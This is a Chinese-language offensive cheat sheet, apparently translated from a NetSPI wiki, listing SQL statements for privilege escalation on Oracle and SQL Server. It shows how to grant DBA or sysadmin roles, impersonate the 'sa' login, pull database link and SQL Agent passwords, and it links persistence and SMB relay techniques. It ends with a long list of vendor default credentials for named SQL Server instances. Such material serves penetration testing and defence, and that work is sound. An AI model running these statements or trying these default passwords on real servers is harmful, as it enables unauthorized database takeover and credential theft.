提升特权
某些功能需要特权用户,并且为了升级漏洞,特权用户始终是第一步。
MySQL
还没有数据,如果您知道任何有用的方法,请在我们的Github上做出贡献!
Oracle
*需要特权用户
| 描述 | 语句 |
|---|---|
| 转储所有DBA用户名 | SELECT username FROM user_role_privs WHERE granted_role=’DBA’; |
| 建立DBA用户 | * GRANT DBA to USER |
| 创建过程 | CREATE OR REPLACE PROCEDURE "SYSTEM".netspi1 (id IN VARCHAR2) AS PRAGMA autonomous_transaction; EXECUTE IMMEDIATE 'grant dba to scott'; COMMIT; END; BEGIN SYSTEM.netspi1('netspi'); END; |
| 查找数据库链接 | SELECT * FROM DBA_DB_LINKS SELECT * FROM ALL_DB_LINKS SELECT * FROM USER_DB_LINKS |
| 查询数据库链接 | SELECT * FROM sales@miami — minimum for preconfigured SELECT * FROM SQLInjection@secfree.com — standard usage for selecting table from schema on remote server SELECT * FROM SQLInjection@secfree.com@hq_1 — standard usage for selecting table from schema on remote server instance SELECT db_link,password FROM user_db_links WHERE db_link LIKE ‘TEST%” SELECT name,password FROM sys.link$ WHERE name LIKE ‘TEST%’; SELECT name,passwordx FROM sys.link$ WHERE name LIKE ‘TEST%’; |
| 在数据库链接上执行存储过程 | EXEC mySchema.myPackage.myProcedure@myRemoteDB( ‘someParameter’ ); SELECT dbms_xmlquery.getxml(‘select * from emp’) FROM SQLInjection@secfree.com |
| 创建数据库链接 | CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com; — connected user setup CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com CONNECT TO harold AS tiger; — standard defined user/pass CREATE SHARED PUBLIC DATABASE LINK hq.netspi.com.com@hq_1 USING ‘string_to_hq_1’; — instance specific CREATE SHARED PUBLIC DATABASE LINK link_2 CONNECT TO jane IDENTIFIED BY doe USING ‘us_supply’; — defined user pass |
| 删除链接 | DROP DATABASE LINK miami; |
SQL Server
*需要特权用户。以下查询需要各种权限类型。请继续关注详细的权限提升路径。
| 描述 | 语句 |
|---|---|
| 建立DBA用户 | * EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin’; |
| 授予所有自定义对象的执行权限 | SELECT ‘grant exec on ‘ + QUOTENAME(ROUTINE_SCHEMA) + ‘.’ + QUOTENAME(ROUTINE_NAME) + ‘ TO test’ FROM INFORMATION_SCHEMA.ROUTINES WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),’IsMSShipped’) = 0 ; |
| 授予执行所有存储过程 | CREATE ROLE db_executor GRANT EXECUTE TO db_executor exec sp_addrolemember ‘db_executor’, ‘YourSecurityAccount’ |
| UNC路径注入 | https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ |
| 检测非模拟登录 | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_ principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ‘IMPERSONATE’ |
| 模拟登录 注意:REVERT会将您带回原始登录名。 | EXECUTE AS LOGIN = ‘sa’; SELECT @@VERSION; |
| 创建sysadmin用户 | * USE [master]GO CREATE LOGIN [test] WITH PASSSWORD=N ‘test’, DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO EXEC master..sp_addsrvrolemember @loginame=N’test’, @rolename=N’sysadmin’ GO |
| 创建sysadmin用户 | * EXEC sp_addlogin ‘user’, ‘pass’;* EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin’; |
| 删除用户 | * EXEC sp_droplogin ‘user’; |
| 检索SQL代理连接密码 | exec msdb.dbo.sp_get_sqlagent_properties |
| 检索DTS连接密码 | select msdb.dbo.rtbldmbprops |
| 获取sysadmin作为本地管理员 | https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/ |
| 启动存储过程 | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ |
| 触发器创建 | https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ |
| Windows自动登录密码 | https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/ |
| xp_regwrite非sysadmin执行 | https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| 具有可信赖数据库的存储过程 | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases |
| 存储过程用户模拟 | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/ |
| 默认密码 | sa:sa sa:[empty] [username]:[username] |
| 实例的默认密码(实例名称,用户,密码) | “ACS”,”ej”,”ej” “ACT7″,”sa”,”sage” “AOM2″,”admin”,”ca_admin” “ARIS”,”ARIS9″,”*ARIS!1dm9n#” “AutodeskVault”,”sa”,”AutodeskVault@26200″ “BOSCHSQL”,”sa”,”RPSsql12345″ “BPASERVER9″,”sa”,”AutoMateBPA9″ “CDRDICOM”,”sa”,”CDRDicom50!” “CODEPAL”,”sa”,”Cod3p@l” “CODEPAL08″,”sa”,”Cod3p@l” “CounterPoint”,”sa”,”CounterPoint8″ “CSSQL05″,”ELNAdmin”,”ELNAdmin” “CSSQL05″,”sa”,”CambridgeSoft_SA” “CADSQL”,”CADSQLAdminUser”,”Cr41g1sth3M4n!” “DHLEASYSHIP”,”sa”,”DHLadmin@1″ “DPM”,”admin”,”ca_admin” “DVTEL”,”sa”,”” “EASYSHIP”,”sa”,”DHLadmin@1″ “ECC”,”sa”,”Webgility2011″ “ECOPYDB”,”e+C0py2007_@x”,”e+C0py2007_@x” “ECOPYDB”,”sa”,”ecopy” “Emerson2012″,”sa”,”42Emerson42Eme” “HDPS”,”sa”,”sa” “HPDSS”,”sa”,”Hpdsdb000001″ “HPDSS”,”sa”,”hpdss” “INSERTGT”,”msi”,”keyboa5″ “INSERTGT”,”sa”,”” “INTRAVET”,”sa”,”Webster#1″ “MYMOVIES”,”sa”,”t9AranuHA7″ “PCAMERICA”,”sa”,”pcAmer1ca” “PCAMERICA”,”sa”,”PCAmerica” “PRISM”,”sa”,”SecurityMaster08″ “RMSQLDATA”,”Super”,”Orange” “RTCLOCAL”,”sa”,”mypassword” “SALESLOGIX”,”sa”,”SLXMaster” “SIDEXIS_SQL”,”sa”,”2BeChanged” “SQL2K5″,”ovsd”,”ovsd” “SQLEXPRESS”,”admin”,”ca_admin” “STANDARDDEV2014″,”test”,”test” “TEW_SQLEXPRESS”,”tew”,”tew” “vocollect”,”vocollect”,”vocollect” “VSDOTNET”,”sa”,”” “VSQL”,”sa”,”111″ |
文章最后更新于 2021-09-22
